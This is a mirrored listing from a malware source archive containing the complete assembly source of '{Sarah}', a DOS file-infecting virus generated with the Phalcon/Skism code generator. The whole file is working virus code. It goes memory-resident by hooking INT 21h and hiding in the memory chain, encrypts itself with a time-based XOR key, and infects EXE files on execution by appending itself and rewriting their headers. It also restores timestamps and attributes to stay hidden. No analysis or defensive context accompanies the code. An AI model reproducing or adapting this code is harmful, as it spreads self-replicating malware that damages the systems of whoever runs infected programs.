mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
284 lines
9.6 KiB
NASM
284 lines
9.6 KiB
NASM
|
; sarah.asm : {Sarah} by Gehenna
|
||
|
; Created wik the Phalcon/Skism Mass-Produced Code Generator
|
||
|
; from the configuration file sarah.cfg
|
||
|
|
||
|
.model tiny ; Handy directive
|
||
|
.code ; Virus code segment
|
||
|
org 0 ; For easy calculation of offsets
|
||
|
id = 'EF' ; ID word for EXE infections
|
||
|
|
||
|
startvirus:
|
||
|
decrypt: ; handles encryption and decryption
|
||
|
patch_startencrypt:
|
||
|
mov bx,offset startencrypt ; start of decryption
|
||
|
mov si,(offset heap - offset startencrypt)/2 ; iterations
|
||
|
decrypt_loop:
|
||
|
db 2eh,81h,37h ; xor word ptr cs:[bx], xxxx
|
||
|
decrypt_value dw 0 ; initialised at zero for null effect
|
||
|
inc bx ; calculate new decryption location
|
||
|
inc bx
|
||
|
dec si ; If we are not done, then
|
||
|
jnz decrypt_loop ; decrypt mo'
|
||
|
startencrypt:
|
||
|
call next ; calculate delta offset
|
||
|
next: pop bp ; bp = IP next
|
||
|
sub bp,offset next ; bp = delta offset
|
||
|
|
||
|
push ds
|
||
|
push es
|
||
|
|
||
|
mov ax,'DA' ; Installation check
|
||
|
int 21h
|
||
|
cmp ax,'PS' ; Already installed?
|
||
|
jz done_install
|
||
|
|
||
|
mov ax, es ; Get PSP
|
||
|
dec ax
|
||
|
mov ds, ax ; Get MCB
|
||
|
|
||
|
sub word ptr ds:[3],(endheap-startvirus+15)/16+1
|
||
|
sub word ptr ds:[12h],(endheap-startvirus+15)/16+1
|
||
|
mov ax,ds:[12h]
|
||
|
mov ds, ax
|
||
|
inc ax
|
||
|
mov es, ax
|
||
|
mov byte ptr ds:[0],'Z' ; Mark end of chain
|
||
|
mov word ptr ds:[1],8 ; Mark owner = DOS
|
||
|
mov word ptr ds:[3],(endheap-startvirus+15)/16 ; Set size
|
||
|
|
||
|
push cs
|
||
|
pop ds
|
||
|
xor di,di ; Destination
|
||
|
mov cx,(heap-startvirus)/2+1 ; Bytes to zopy
|
||
|
mov si,bp ; lea si,[bp+offset startvirus]
|
||
|
rep movsw
|
||
|
|
||
|
mov di,offset encrypt
|
||
|
mov si,bp ; lea si,[bp+offset startvirus]
|
||
|
mov cx,startencrypt-decrypt
|
||
|
rep movsb
|
||
|
mov al,0c3h ; retn
|
||
|
stosb
|
||
|
|
||
|
xor ax,ax
|
||
|
mov ds,ax
|
||
|
push ds
|
||
|
lds ax,ds:[21h*4] ; Get old int handler
|
||
|
mov word ptr es:oldint21, ax
|
||
|
mov word ptr es:oldint21+2, ds
|
||
|
pop ds
|
||
|
mov word ptr ds:[21h*4], offset int21 ; Replace with new handler
|
||
|
mov ds:[21h*4+2], es ; in high memory
|
||
|
done_install:
|
||
|
pop es
|
||
|
pop ds
|
||
|
mov ax,es ; AX = PSP segment
|
||
|
add ax,10h ; Adjust for PSP
|
||
|
add word ptr cs:[bp+oldCSIP+2],ax
|
||
|
add ax,word ptr cs:[bp+oldSSSP+2]
|
||
|
cli ; Clear intrpts for stack manipulation
|
||
|
mov sp,word ptr cs:[bp+oldSSSP]
|
||
|
mov ss,ax
|
||
|
sti
|
||
|
db 0eah ; jmp ssss:oooo
|
||
|
oldCSIP dd 0fff00000h ; Needed for carrier file
|
||
|
oldSSSP dd ? ; Original SS:SP
|
||
|
|
||
|
virus db '{Sarah}',0
|
||
|
author db '<Gehenna>',0
|
||
|
|
||
|
int21: ; New interrupt handler
|
||
|
cmp ax,'DA' ; Installation check?
|
||
|
jnz notinstall
|
||
|
mov ax,'PS'
|
||
|
iret
|
||
|
notinstall:
|
||
|
pushf
|
||
|
push ax
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push si
|
||
|
push di ; don't need to save bp
|
||
|
push ds
|
||
|
push es
|
||
|
cmp ax,4b00h ; Infect on execute
|
||
|
jz infectDSDX
|
||
|
exithandler:
|
||
|
pop es
|
||
|
pop ds
|
||
|
pop di
|
||
|
pop si
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
popf
|
||
|
db 0eah ; JMP SSSS:OOOO
|
||
|
oldint21 dd ? ; Go to orig handler
|
||
|
|
||
|
infectDSDX:
|
||
|
mov ax,4300h
|
||
|
int 21h
|
||
|
push ds
|
||
|
push dx
|
||
|
push cx ; Save attributes
|
||
|
xor cx,cx ; Clear attributes
|
||
|
call attributes ; Set file attributes
|
||
|
|
||
|
mov ax,3d02h ; Open read/write
|
||
|
int 21h
|
||
|
xchg ax,bx
|
||
|
|
||
|
mov ax,5700h ; Get creation date/time
|
||
|
int 21h
|
||
|
push cx ; Save date and
|
||
|
push dx ; time
|
||
|
|
||
|
push cs ; DS = CS
|
||
|
pop ds
|
||
|
push cs ; ES = CS
|
||
|
pop es
|
||
|
mov ah,3fh ; Read file to buffer
|
||
|
mov dx,offset buffer ; @ DS:DX
|
||
|
mov cx,1Ah ; 1Ah bytes
|
||
|
int 21h
|
||
|
|
||
|
mov ax,4202h ; Go to end of file
|
||
|
xor cx,cx
|
||
|
cwd
|
||
|
int 21h
|
||
|
|
||
|
mov word ptr filesize,ax
|
||
|
mov word ptr filesize+2,dx
|
||
|
checkEXE:
|
||
|
cmp word ptr buffer+10h,id ; is it already infected?
|
||
|
jnz infect_exe
|
||
|
done_file:
|
||
|
mov ax,5701h ; Restore creation date/time
|
||
|
pop dx ; Restore date and
|
||
|
pop cx ; time
|
||
|
int 21h
|
||
|
|
||
|
mov ah,3eh ; Close file
|
||
|
int 21h
|
||
|
|
||
|
pop cx
|
||
|
pop dx
|
||
|
pop ds ; Restore filename
|
||
|
call attributes ; attributes
|
||
|
|
||
|
jmp exithandler
|
||
|
infect_exe:
|
||
|
mov cx, 1ah
|
||
|
push cx
|
||
|
push bx ; Save file handle
|
||
|
les ax,dword ptr buffer+14h ; Save old entry point
|
||
|
mov word ptr oldCSIP, ax
|
||
|
mov word ptr oldCSIP+2, es
|
||
|
|
||
|
les ax,dword ptr buffer+0Eh ; Save old stack
|
||
|
mov word ptr oldSSSP,es
|
||
|
mov word ptr oldSSSP+2,ax
|
||
|
|
||
|
mov ax,word ptr buffer+8 ; Get header size
|
||
|
mov cl, 4 ; convert to bytes
|
||
|
shl ax, cl
|
||
|
xchg ax, bx
|
||
|
|
||
|
les ax,dword ptr filesize ; Get file size
|
||
|
mov dx, es ; to DX:AX
|
||
|
push ax
|
||
|
push dx
|
||
|
|
||
|
sub ax, bx ; Subtract header size from
|
||
|
sbb dx, 0 ; file size
|
||
|
|
||
|
mov cx, 10h ; Convert to segment:offset
|
||
|
div cx ; form
|
||
|
|
||
|
mov word ptr buffer+14h, dx ; New entry point
|
||
|
mov word ptr buffer+16h, ax
|
||
|
|
||
|
mov word ptr buffer+0Eh, ax ; and stack
|
||
|
mov word ptr buffer+10h, id
|
||
|
|
||
|
pop dx ; get file length
|
||
|
pop ax
|
||
|
pop bx ; Restore file handle
|
||
|
|
||
|
add ax, heap-startvirus ; add virus size
|
||
|
adc dx, 0
|
||
|
|
||
|
mov cl, 9
|
||
|
push ax
|
||
|
shr ax, cl
|
||
|
ror dx, cl
|
||
|
stc
|
||
|
adc dx, ax
|
||
|
pop ax
|
||
|
and ah, 1 ; mod 512
|
||
|
|
||
|
mov word ptr buffer+4, dx ; new file size
|
||
|
mov word ptr buffer+2, ax
|
||
|
|
||
|
push cs ; restore ES
|
||
|
pop es
|
||
|
|
||
|
mov ax,word ptr buffer+14h ; needed later
|
||
|
finishinfection:
|
||
|
add ax,offset startencrypt-offset decrypt
|
||
|
mov word ptr encrypt+(patch_startencrypt-startvirus)+1,ax
|
||
|
|
||
|
get_encrypt_value:
|
||
|
mov ah,2ch ; Get current time
|
||
|
int 21h ; dh=sec,dl=1/100 sec
|
||
|
or dx,dx ; Check if encryption value = 0
|
||
|
jz get_encrypt_value ; Get another if it is
|
||
|
mov word ptr encrypt+(decrypt_value-startvirus),dx ; New encrypt. value
|
||
|
xor si,si ; copy virus to buffer
|
||
|
mov di,offset zopystuff
|
||
|
mov cx,heap-startvirus
|
||
|
rep movsb
|
||
|
|
||
|
mov si,offset encrypt ; copy encryption function
|
||
|
mov di,offset zopystuff
|
||
|
mov cx,startencrypt-decrypt
|
||
|
rep movsb
|
||
|
|
||
|
mov word ptr [encrypt+(patch_startencrypt-startvirus)+1],offset zopystuff+(startencrypt-decrypt)
|
||
|
|
||
|
push bx
|
||
|
call encrypt
|
||
|
pop bx
|
||
|
|
||
|
mov ah,40h ; Concatenate virus
|
||
|
mov dx,offset zopystuff
|
||
|
mov cx,heap-startvirus ; # bytes to write
|
||
|
int 21h
|
||
|
|
||
|
mov ax,4200h ; Move file pointer
|
||
|
xor cx,cx ; to beginning of file
|
||
|
cwd ; xor dx,dx
|
||
|
int 21h
|
||
|
|
||
|
mov ah,40h ; Write to file
|
||
|
mov dx,offset buffer ; Write from buffer
|
||
|
pop cx ; cx bytes
|
||
|
int 21h
|
||
|
|
||
|
jmp done_file
|
||
|
|
||
|
attributes:
|
||
|
mov ax,4301h ; Set attributes to cx
|
||
|
int 21h
|
||
|
ret
|
||
|
|
||
|
heap: ; Variables not in code
|
||
|
filesize dd ?
|
||
|
encrypt: db startencrypt-decrypt+1 dup (?)
|
||
|
zopystuff db heap-startvirus dup (?) ; Encryption buffer
|
||
|
buffer db 1ah dup (?) ; read buffer
|
||
|
endheap: ; End of virus
|
||
|
end startvirus
|